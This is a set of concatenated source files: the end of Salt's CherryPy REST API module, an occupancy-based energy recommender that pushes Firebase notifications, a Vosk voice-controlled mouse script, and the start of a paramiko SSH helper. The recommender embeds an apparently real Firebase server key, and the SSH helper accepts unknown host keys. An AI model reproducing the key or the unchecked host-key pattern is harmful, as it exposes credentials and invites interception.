Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
recommendationSystem.py
|
import cloudserver
from threading import Thread
import time
import datetime
import numpy as np
import cvxopt
from cvxopt import glpk
import random
from spaceNames import S
from spaceNames import NS
from spaceNames import realS
from personal import P
from personal import PO
from IDs import Jgroup
from IDs import Tgroup
from IDs import Bgroup
import numpy as npn
import tensorflow as tensf
import math
import requests
import json
class recommenderSystem:
def __init__(self):
self.initState()
self.setup()
self.startDaemon()
def initState(self):
self.footprints = {}
self.personal = {}
self.spaceDef = {}
self.nonSpaceDef = {}
self.realSDef = {}
self.spaces = S
self.nonSpaces = NS
self.realS = realS
self.timeout = {}
print("Found " + str(len(self.spaces)) + " spaces")
self.personalDevices = P
self.owners = PO
self.peopleID = Jgroup+Bgroup+Tgroup
i = 0
for room in self.spaces:
if (i == 0):
assert(room == "outOfLab") #first room must be out of lab
self.footprints[room] = []
self.spaceDef[room] = i
self.realSDef[room] = self.realS[i]
i += 1
self.spaceDefInv = {v: k for k, v in self.spaceDef.items()}
for room in self.nonSpaces:
self.nonSpaceDef[room] = i
i += 1
self.nonSpaceDefInv = {v: k for k, v in self.nonSpaceDef.items()}
self.peopleDef = {}
i = 0
for person in self.peopleID:
self.timeout[person] = 0
self.peopleDef[person] = i
i += 1
self.peopleDefInv = {v: k for k, v in self.peopleDef.items()}
self.deviceDef = {}
i = 0
for device in self.personalDevices:
self.personal[device] = []
self.deviceDef[device] = i
i += 1
self.deviceDefInv = {v: k for k, v in self.deviceDef.items()}
self.deviceOwnership = {}
assert(len(self.personalDevices) == len(self.owners))
for i in range(len(self.personalDevices)):
device = self.personalDevices[i]
self.deviceOwnership[device] = self.owners[i]
# for device in self.personalDevices:
# self.deviceOwnership[device] = "Peter"
self.offsetVec1 = len(self.peopleDef)
self.offsetVec2 = self.offsetVec1 + len(self.spaceDef)
self.offsetVec3 = self.offsetVec2 + len(self.deviceDef)
self.vecLen = len(self.peopleDef) + len(self.spaceDef) + len(self.deviceDef)
self.offset1 = len(self.peopleDef) * len(self.spaceDef)
self.offset2 = self.offset1 + len(self.deviceDef)
self.offset3 = self.offset2 + len(self.spaceDef)
self.offset4 = self.offset3 + len(self.peopleDef)
self.recLen = self.offset4 # len of recommendation vector
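# Layout notes derived from the offsets above:
# - The state vector fed to the model is
#   [per-person location index | per-room shared energy | per-device personal energy],
#   with section boundaries at offsetVec1, offsetVec2 and offsetVec3 (vecLen entries);
#   getState() additionally appends the per-room occupancy counts and a trailing
#   time placeholder.
# - The flattened action/recommendation vector is
#   [move (people x spaces) | reduce (devices) | force (spaces) | shift (people)],
#   with boundaries at offset1, offset2, offset3 and offset4 (= recLen);
#   interpretAction() maps an index in this vector back to a suggestion.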
def setup(self):
self.checkInterval = 60*15 # 15 minutes
self.users = None
self.userRecommendations = {}
self.locations = {}
self.rewards = {}
self.HVAC = {}
self.Lights = {}
self.Electric = {}
self.SpaceParameters = {}
self.spaces = {}
self.spaceNames = []
self.a = [] #room HVAC variance
self.b = [] #room light variance
self.z = [] #room max occupancy
self.x = 0 #current occupancy
self.getUsers()
self.setSpaceParameters()
#self.getUserLocations()
def setSpaceParameters(self, temp=72):
rooms = cloudserver.db.list_of_rooms
self.spaces = rooms
for room in rooms:
print("Loading room " + str(room) + "...")
self.SpaceParameters[room] = 0.2
def getUsers(self):
#create a list of users from the database
self.users = cloudserver.db.dumpUsers()
print("Loaded " + str(len(self.users)) + " users")
for user in self.users:
if "name" not in user or "userID" not in user:
continue
self.userRecommendations[user["userID"]] = []
self.rewards[user["userID"]] = user["balance"]
print("Loaded user recommendations dictionary")
def loadBuildingParams(self):
appliances = cloudserver.db.list_of_appliances
self.HVAC = {}
self.Lights = {}
self.Electric = {}
rooms = cloudserver.db.list_of_rooms
for room in rooms:
self.HVAC[room] = 0
self.Lights[room] = 0
self.Electric[room] = 0
print("Loading building parameters...")
for app in appliances:
appliance = appliances[app]
rooms = appliance["rooms"]
value = appliance["value"]
t = appliance["type"]
n = len(rooms)
for room in rooms:
if t == "Electrical":
if room not in self.Electric:
self.Electric[room] = value/n
else:
self.Electric[room] += value/n
elif t == "Light":
if room not in self.Lights:
self.Lights[room] = value/n
else:
self.Lights[room] += value/n
elif t == "HVAC":
if room not in self.HVAC:
self.HVAC[room] = value/n
else:
self.HVAC[room] += value/n
print("Finished loading building parameters.")
def getUserLocations(self):
self.locations = cloudserver.db.location_of_users
return
def returnRecs(self, user):
balance = 0
if user in self.rewards:
balance = self.rewards[user]
tempBalance = balance
json_return={
"location":"Location Name",
"location_id":"locationIDString",
"balance":balance,
"tempBalance": tempBalance,
"suggestions":[]
}
location = "outOfLab"
if user in self.locations:
location = self.locations[user]
json_return["location_id"]=location
json_return["location"]=cloudserver.db.RoomIdToName(location)
for person in self.userRecommendations:
print(str(len(self.userRecommendations[person])) + " " + person)
if user in self.userRecommendations:
for rec in self.userRecommendations[user]:
json_return["suggestions"].append(rec)
print(rec)
ret = cloudserver.db._encode(json_return,False)
return ret
def clearRecs(self, user, messageID):
print("CLEAR RECOMMENDATION")
if user in self.userRecommendations:
recs = self.userRecommendations[user]
if recs is None:
return
for i in range(len(recs)):
rec = recs[i]
print(messageID)
print(rec["messageID"])
if messageID == rec["messageID"]:
r = self.userRecommendations[user].pop(i)
print("Removed recommendation " + messageID + " from user " + user + " recommendation list. (clearRecs method)")
return
def decideNotification(self, deviceID):
if time.time() > self.timeout[deviceID] + 60*15:
self.timeout[deviceID] = time.time()
def clearRecommendations(self):
for user in self.userRecommendations:
self.userRecommendations[user] = []
def bestRecommendations(self, solutions):
#print("Getting best recommendations....")
#print(solutions)
for user in self.locations:
if user not in self.userRecommendations:
continue
#print(self.locations[user])
if (self.locations[user]) not in solutions:
r = random.choice(list(solutions))
message = "{0}|{1}|{2}".format("move", user, r)
suggestion = self.make_suggestion_item("move", "Move", "Move to " + self.realSDef[r], 3, message, 0)
self.checkRecommendation(user, suggestion)
return
def make_suggestion_item(self, iType, iTitle, iBodyText, iReward, messageID, inotification=0, Others={}):
Others = {
"type":iType,
"title":iTitle,
"body":iBodyText,
"reward":iReward,
"notification":inotification,
"messageID":messageID
}
return Others
def LPOptimization(self, spaces, a, b, z, x1):
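# What the GLPK call below encodes (descriptive comment): a binary integer program
# with one 0/1 indicator per candidate room. The objective c minimizes the summed
# HVAC + lighting cost a[i] + b[i] of the selected rooms, and the single constraint
# G.T x <= h (with z holding negated max occupancies and h = [-x1]) requires the
# combined capacity of the selected rooms to cover the current occupancy x1.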
energySum = []
solutions = {}
assert(len(a) == len(b))
for i in range(len(a)):
energySum.append(a[i] + b[i])
c = cvxopt.matrix(energySum, tc='d')
G = cvxopt.matrix(z, tc='d')
h = cvxopt.matrix([-1*x1], tc='d')
(status, x) = cvxopt.glpk.ilp(c,G.T,h,I=set(range(len(a))),B=set(range(len(a))))
print(status)
print(x)
for i in range(len(a)):
if x[i] > 0.5:
solutions[spaces[i]]= -1*z[i]
return solutions
def formatInputs(self):
self.spaceNames = []
self.a = [] #room HVAC variance
self.b = [] #room light variance
self.z = [] #room max occupancy
self.x = 0 #current occupancy
for s in self.spaces:
space = self.spaces[s]
if space["space"] == 1 and space["lab"] == 3:
self.spaceNames.append(s)
self.z.append(-1*space["maxOccupancy"])
HVAC = self.HVAC[s]*self.SpaceParameters[s]
self.a.append(HVAC)
Light = self.Lights[s]
self.b.append(Light)
self.x = len(self.locations)
def getSnapshot(self):
shot = cloudserver.db.snapshots_col_appliances.find().skip(cloudserver.db.snapshots_col_appliances.count()-1)
shot = list(shot)
shot = shot[0]
for room in self.spaces:
self.footprints[room] = 0 # shared energy (HVAC + Lights)
for p in self.personal:
self.personal[p] = 0 # personal energy (plugmeters)
for applianceName in shot["data"]:
appliance = shot["data"][applianceName]
rooms = appliance["rooms"]
t = appliance["type"]
if t == "Electrical":
if applianceName in self.personal:
self.personal[applianceName] = appliance["value"]
continue
numRooms = len(rooms)
for room in rooms:
if room not in self.footprints:
print("room " + room + " not in space database")
continue
if t == "HVAC":
self.footprints[room] += appliance["value"]/numRooms  # *self.multiplier/numRooms
elif t == "Light":
self.footprints[room] += appliance["value"]/numRooms
print("finished getting appliance data")
def getState(self):
t1 = time.time() * 1000
self.getSnapshot()
t2 = time.time() * 1000
t_snapshot = t2 - t1
state = [0] * self.vecLen
t3 = time.time()*1000
shot = cloudserver.db.snapshots_col_users.find().skip(cloudserver.db.snapshots_col_users.count()-1)
t4 = time.time()*1000
t_DB = t4 - t3
print("\n\n\n---Snapshot: {0}ms".format(t_snapshot))
print("---DB Query: {0}ms\n\n\n".format(t_DB))
shot = list(shot)
shot = shot[0]
locations = [0] * len(self.spaceDef) #array of number of people in each space
t5 = time.time()*1000
for ID in shot["data"]:
if ID not in self.peopleDef:
continue
IDnum = self.peopleDef[ID] #person number
loc = shot["data"][ID]["location"]
locnum = 0
if loc in self.spaceDef:
locnum = self.spaceDef[loc] #location number
#elif loc in self.nonSpaceDef:
# locnum = self.nonSpaceDef[loc]
locations[locnum] += 1
state[IDnum] = locnum #assign space to input vector
else:
continue
t6 = time.time() * 1000
for room in self.footprints:
if room not in self.spaceDef:
continue
energy = self.footprints[room]
roomIndex = self.spaceDef[room]
offset = len(self.peopleDef)
state[roomIndex + offset] = energy
t7 = time.time() * 1000
for device in self.personal:
if device not in self.deviceDef:
continue
energy = self.personal[device]
deviceIndex = self.deviceDef[device]
offset = len(self.peopleDef) + len(self.spaceDef)
state[deviceIndex + offset] = energy
t8 = time.time() * 1000
t_ID = t6 - t5
t_room = t7 - t6
t_device = t8 - t7
print("\n\n\n---List:{0}ms".format(t5-t4))
print("---ID Loop:{0}ms".format(t_ID))
print("---Room Loop:{0}ms".format(t_room))
print("---Device Loop:{0}ms\n\n\n".format(t_device))
state += locations
state.append(72) #just to keep the time
print("Finished getting state")
return state
def randomRecommendations(self):
# for user in self.locations:
for user in self.userRecommendations:
# if user not in self.userRecommendations:
# continue
#print(self.locations[user])
r = random.choice(list(self.spaceDef.keys()))
message = "{0}|{1}|{2}".format("move", user, r)
body = "Move to " + self.realSDef[r] + "."
rec = self.make_suggestion_item("move", "Move", body, 3, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
for user in self.userRecommendations:
message = "{0}|{1}|{2}".format("shift", user, "XXXX")
body = "Come to lab now to save energy."
rec = self.make_suggestion_item("shift", "Shift", body, 3, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
for user in self.userRecommendations:
message = "{0}|{1}|{2}".format("shade", user, "XXXX")
body = "Lower shade on your window to save energy."
rec = self.make_suggestion_item("shade", "Shade", body, 1, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
return
def deepLearning(self):
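# High-level flow (descriptive comment): build the current state vector, restore the
# pre-trained TensorFlow graph from ./model_6_1 and evaluate its output for every
# action, then post-filter per user: 90% of the time "move" targets are restricted to
# the rooms allowed for that user's lab group, and 10% of the time the unrestricted
# argmax is taken. The chosen indices are turned into suggestions via
# interpretAction() and throttled by checkRecommendation().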
t1 = time.time()*1000
state = self.getState()
t2 = time.time()*1000
t_state = t2 - t1
sess1 = tensf.Session()
saver = tensf.train.import_meta_graph('./model_6_1/model_6_1.meta', clear_devices=True)
saver.restore(sess1, tensf.train.latest_checkpoint('./model_6_1'))
graph = tensf.get_default_graph()
x1 = graph.get_tensor_by_name('s:0')
y1 = graph.get_tensor_by_name('eval_net/l3/output:0')
npState = np.array([state])
# Run inference in the session the checkpoint was restored into; initializing
# variables in a fresh session would replace the restored weights with random values.
y_out = sess1.run(y1, feed_dict={x1: npState})
sess1.close()
print("y_out length")
print(str(y_out.shape))
y_new = y_out.flatten()
t3 = time.time()*1000
t_NN = t3 - t2
icslSpace = [5, 7, 8, 9, 13, 14, 15, 16]
bSpace = [1, 11, 12]
tSpace = [6, 10, 14]
for user in self.peopleDef:
personNum = self.peopleDef[user] #person number
# print(personNum)
################
## Contextual Post filtering
###############
###############
## Interpret the group number to do filtering
groupNum = 0
if personNum <= 3:
# print("ICSL")
groupNum = 1
elif personNum > 3 and personNum <= 6:
# print("Burke")
groupNum = 2
else:
# print("Teherani")
groupNum = 3
###############
## 10 percent exploring (delivering whichever action has the largest reward)
## 90 percent exploiting (do filtering to give more reasonable recommendation)
token = random.random()
personalNum = np.argmax(y_new[self.offset1:self.offset2])
if token < 0.9:
# print("Exploiting")
#personActionNum = np.argmax(y_new[personNum*len(self.spaceDef):(personNum+1)*len(self.spaceDef)])
if groupNum == 1: ## icsl lab
if personNum == 0: ## Fred, presumably only will work in his office
# print("Fred")
personActionNum = 2
## Add checking whether Fred's device has a positive reward
else: ## Kevin and Stephen, can work at any place available, other than professor's office
# print("Kevin and Stephen")
lc = [y_new[x + personNum*len(self.spaceDef)] for x in icslSpace]
personActionNum = personNum*len(self.spaceDef) + icslSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+icslSpace])
elif groupNum == 2: ## Burke lab, can work at any place available, other than professor's office
# print("Burke Lab")
lc = [y_new[x + personNum*len(self.spaceDef)] for x in bSpace]
personActionNum = personNum*len(self.spaceDef) + bSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+bSpace])
else: #Teherani lab
lc = [y_new[x + personNum*len(self.spaceDef)] for x in tSpace]
personActionNum = personNum*len(self.spaceDef) + tSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+tSpace])
else:
print("Exploring")
personActionNum = np.argmax(y_new[personNum*len(self.spaceDef):(personNum+1)*len(self.spaceDef)])
personActionNum += personNum*len(self.spaceDef)
# print(personActionNum)
rec1 = self.interpretAction(personActionNum, y_new[personActionNum])
# rec2 = self.interpretAction(personalNum, y_new[personalNum])
if rec1 is not None:
print("Got recommendation")
self.checkRecommendation(user, rec1)
else:
print("Recommendation is not found")
# if rec2 is not None:
# print("Got recommendation")
# self.checkRecommendation(user, rec2)
# else:
# print("Recommendation is not found")
deviceMinimum = 1
num = 0
for d in self.deviceDef:
num = self.deviceDef[d]
break
for person in self.peopleDef:
rec1 = None
deviceNum = num + self.offset1
rec1 = self.interpretAction(deviceNum, 20)
self.checkRecommendation(person, rec1)
for owner in self.userRecommendations:
rec1 = None
maxReward = deviceMinimum
for device in self.deviceDef:
deviceNum = self.deviceDef[device] + self.offset1
realOwner = self.deviceOwnership[device]
if realOwner is None or owner != realOwner:
continue
if y_new[deviceNum] > deviceMinimum and y_new[deviceNum] > maxReward:
rec1 = self.interpretAction(deviceNum, y_new[deviceNum])
maxReward = y_new[deviceNum]
self.checkRecommendation(owner, rec1)
shiftMinimum = 1
for person in self.peopleDef:
rec1 = None
personNum = self.peopleDef[person] + self.offset3
if y_new[personNum] > shiftMinimum:
rec1 = self.interpretAction(personNum, y_new[personNum])
if rec1 is not None:
print("Got shift recommendation")
self.checkRecommendation(person, rec1)
#for user in self.userRecommendations:
# message = "{0}|{1}|{2}".format("shade", user, "XXXX")
# body = "Lower shade on your window to save energy."
# rec = self.make_suggestion_item("shade", "Shade", body, 1, message, 0)
# self.checkRecommendation(user, rec)
t4 = time.time()*1000
t_rec = t4 - t3
print("\n\n\nFinished time analysis:")
print("---Get States Time: {0}ms".format(t_state))
print("---DNN Computation: {0}ms".format(t_NN))
print("---Recommendations: {0}ms\n\n\n".format(t_rec))
def interpretAction(self, actionNum, reward):
sign = 1
if (reward < 0):
sign = -1
reward = math.log10(reward*sign)
#reward = reward * sign
reward = int(reward)
body = ""
rec = None
if actionNum < self.offset1:
person = actionNum // len(self.spaceDef)  # integer division so it can index peopleDefInv
print(person)
space = actionNum % len(self.spaceDef)
personName = self.peopleDefInv[person]
spaceName = self.spaceDefInv[space]
message = "{0}|{1}|{2}".format("move", personName, spaceName)
body = "Move to " + self.realSDef[spaceName] + "."
rec = self.make_suggestion_item("move", "Move", body, reward, message, 0)
if actionNum >= self.offset1 and actionNum < self.offset2:
device = actionNum - self.offset1
deviceName = self.deviceDefInv[device]
deviceOwner = self.deviceOwnership[deviceName]
message = "{0}|{1}|{2}".format("reduce", deviceOwner, deviceName)
body = "Reduce Power of " + deviceName
rec = self.make_suggestion_item("reduce", "Reduce", body, reward, message, 0)
if actionNum >= self.offset2 and actionNum < self.offset3:
space = actionNum - self.offset2
spaceName = self.spaceDefInv[space]
message = "{0}|{1}|{2}".format("force", "BuildingManager", spaceName)
body = "Force People from " + self.realSDef[spaceName]
rec = self.make_suggestion_item("force", "Force", body, reward, message, 0)
if actionNum >= self.offset3:
person = actionNum - self.offset3
personName = self.peopleDefInv[person]
message = "{0}|{1}|{2}".format("shift", personName, "XXXX")
body = "Come to lab now to save energy."
rec = self.make_suggestion_item("shift", "Shift", body, reward, message, 0)
return rec
def debugRecommendations(self):
print("\n\nDEBUG RECOMMENDATIONS---" + str(len(self.userRecommendations)) + " Users\n")
for user in self.userRecommendations:
print("User " + user)
print("---------")
recList = self.userRecommendations[user]
for rec in recList:
print(rec["type"])
print(rec["title"])
print(rec["body"])
print(" ")
def makeDataJSON(self, body):
newData = {"Text":body}
newDataJSON = json.dumps(newData)  # serialize the dict to a JSON string
return newDataJSON
def checkRecommendation(self, user, rec):
if user not in self.userRecommendations:
return
nowTime = cloudserver.db._now()
moveTime = 20*60
reduceTime = 10*60
forceTime = 30*60
shiftTime = 12*60*60
shadeTime = 60*60
if rec is None or "messageID" not in rec:
return
print(rec["messageID"])
message = rec["messageID"]
t = rec["type"]
if (t == "move" and cloudserver.db.pushManagementDispCheck(message, nowTime-moveTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "reduce" and cloudserver.db.pushManagementDispCheck(message, nowTime-reduceTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "force" and cloudserver.db.pushManagementDispCheck(message, nowTime-forceTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "shift" and cloudserver.db.pushManagementDispCheck(message, nowTime-shiftTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "shade" and cloudserver.db.pushManagementDispCheck(message, nowTime-shadeTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
#POST the notification through Firebase
body = rec["body"]
#if (t == "move"):
#body = "Please move to Lab Space A"
#dataJSON = self.makeDataJSON(body)
payload = json.dumps({"to":"/topics/useApp", "data":{"Text":body}})
send_url = 'https://fcm.googleapis.com/fcm/send'
headers = {"content-type":"application/json", "Authorization": "key=AAAAiCJmlCI:APA91bGzlrEKerd_O3SFnhgZJPJGg7OeoKbQ-hqONN2aFml5_A9FHstb957zwa7S2pXQ6tlxs2YZVBbpPPSsaYVhWIGdVYZpyVVa6KzsntVWXAFeK2fpoz--raiRg8Hd0E-zfNEZ30Gx"}
if (user == "36cd923d8be79f40" and t != "shade"):
r = requests.post(send_url, data=payload, headers=headers)
print("\nPost return is: " + r.text + "\n")
return
def runOptimization(self):
self.setSpaceParameters()
self.formatInputs()
solutions = self.LPOptimization(self.spaceNames, self.a, self.b, self.z, self.x)
self.bestRecommendations(solutions)
def startDaemon(self):
t=Thread(target=self._loopCheckDatabase,args=())
t.setDaemon(True)
t.start()
def _loopCheckDatabase(self):
self.getUserLocations()
self.loadBuildingParams()
while True:
self.clearRecommendations()
#self.runOptimization()
#self.randomRecommendations()
self.deepLearning()
self.debugRecommendations()
# will print the recommendations to terminal, comment to disable
time.sleep(self.checkInterval)
print "Interval"
|
__main__.py
|
import logging.handlers
import os
import sys
from pathlib import Path
### Libraries for threading functions
import threading
from queue import Queue
### Libraries for the mouse and speech recognition
import mouse
import sounddevice as sd
import vosk
import argparse
import json
if getattr(sys, "frozen", False) and hasattr(sys, "_MEIPASS"):
meipass = Path(sys._MEIPASS)
lib_path = next(meipass.glob("*glfw*"), None)
os.environ["PYGLFW_LIBRARY"] = str(lib_path)
from .models import Host_Controller
from .overlay import GazeOverlay
from .texture import PITextureController
from .ui import HostViewController
from .window import Window
### Function that runs in parallel with the video processing
def audio_recognition (args, q_vosk, model, dump_fn):
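# Stream microphone audio into Vosk and map recognized French keywords
# ("sélection", "option", "montée", "descente") to left click, right click, scroll up and scroll down.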
with sd.RawInputStream(samplerate=args.samplerate, blocksize = 8000, device=args.device, dtype='int16',
channels=1, callback=callback):
rec = vosk.KaldiRecognizer(model, args.samplerate)
while True:
data = q_vosk.get()
if rec.AcceptWaveform(data):
dictResult = json.loads(rec.Result())
# Keywords for the mouse actions
if "sélection" in dictResult.get("text"):
print("[LEFT CLICK]")
mouse.click("left")
if "option" in dictResult.get("text"):
print("[RIGHT CLICK]")
mouse.click("right")
if "montée" in dictResult.get("text"):
print("[UP]")
mouse.wheel(1)
if "descente" in dictResult.get("text"):
print("[DOWN]")
mouse.wheel(-1)
else:
pass
# print(rec.PartialResult())
if dump_fn is not None:
dump_fn.write(data)
if __name__ == "__main__":
q_vosk = Queue()
def int_or_str(text):
"""Helper function for argument parsing."""
try:
return int(text)
except ValueError:
return text
def callback(indata, frames, time, status):
"""This is called (from a separate thread) for each audio block."""
if status:
print(status, file=sys.stderr)
q_vosk.put(bytes(indata))
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'-l', '--list-devices', action='store_true',
help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
print(sd.query_devices())
parser.exit(0)
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
parents=[parser])
parser.add_argument(
'-f', '--filename', type=str, metavar='FILENAME',
help='audio file to store recording to')
parser.add_argument(
'-m', '--model', type=str, metavar='MODEL_PATH',
help='Path to the model')
parser.add_argument(
'-d', '--device', type=int_or_str,
help='input device (numeric ID or substring)')
parser.add_argument(
'-r', '--samplerate', type=int, help='sampling rate')
args = parser.parse_args(remaining)
if args.model is None:
args.model = "model"
if not os.path.exists(args.model):
print ("Please download a model for your language from https://alphacephei.com/vosk/models")
print ("and unpack as 'model' in the current folder.")
parser.exit(0)
if args.samplerate is None:
device_info = sd.query_devices(args.device, 'input')
# soundfile expects an int, sounddevice provides a float:
args.samplerate = int(device_info['default_samplerate'])
model = vosk.Model(args.model)
print('Loaded Vosk model: ' + str(model))
if args.filename:
dump_fn = open(args.filename, "wb")
else:
dump_fn = None
### Threading ###
thr = threading.Thread(target = audio_recognition, args = (args, q_vosk, model, dump_fn,) )
thr.start()
log_path = Path.home() / "pi_monitor_settings" / "pi_monitor.log"
log_path.parent.mkdir(exist_ok=True)
handlers = [
logging.StreamHandler(),
logging.handlers.RotatingFileHandler(log_path, mode="w", backupCount=30),
]
logging.basicConfig(
level=logging.DEBUG,
handlers=handlers,
style="{",
format="{asctime} [{levelname}] {message}",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
try:
host_controller = Host_Controller()
# frame observer
texture_controller = PITextureController()
host_controller.add_observer("on_host_linked", texture_controller.reset)
host_controller.add_observer("on_recent_frame", texture_controller.update)
gaze_overlay = GazeOverlay()
host_controller.add_observer("on_recent_gaze", gaze_overlay.update)
win = Window(
texture_controller,
frame_rate=60.0,
callables=[
host_controller.poll_events,
host_controller.fetch_recent_data,
gaze_overlay.draw
],
)
win.open()
host_view_controller = HostViewController(
gui_parent=win.quickbar, controller=host_controller
)
win.run_event_loop()
except KeyboardInterrupt:
pass
except Exception:
logger.exception("Exception occured!")
for handler in logging.getLogger().handlers:
if isinstance(handler, logging.handlers.RotatingFileHandler):
handler.doRollover()
finally:
win.close()
host_controller.cleanup()
host_view_controller.cleanup()
logging.shutdown()
|
remote_scp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-12-13 16:35:33
# @Author : Zhongyi Qiao
# @Link : ${link}
# @Version : $Id$
import sys,os,getopt
import paramiko
import threading
import configparser
from scp import SCPClient
def getConnection(ip,username,password,command,port=22,local_filename="",remotepath="",remote_filename="",localpath=""):
"""
:param ip: 服务器的ip
:param username: 服务器的用户名称
:param password: 服务器的密码
:param CMD: 服务器的命令
:param port: 服务器的端口
"""
ssh = paramiko.SSHClient()
policy = paramiko.AutoAddPolicy()
ssh.set_missing_host_key_policy(policy)
ssh.connect(
hostname = ip, # server IP address
port = port, # SSH port
username = username, # login user
password = password # password for the user
)
# execute a remote command and/or transfer files
if command:
stdin, stdout, stderr = ssh.exec_command(command)
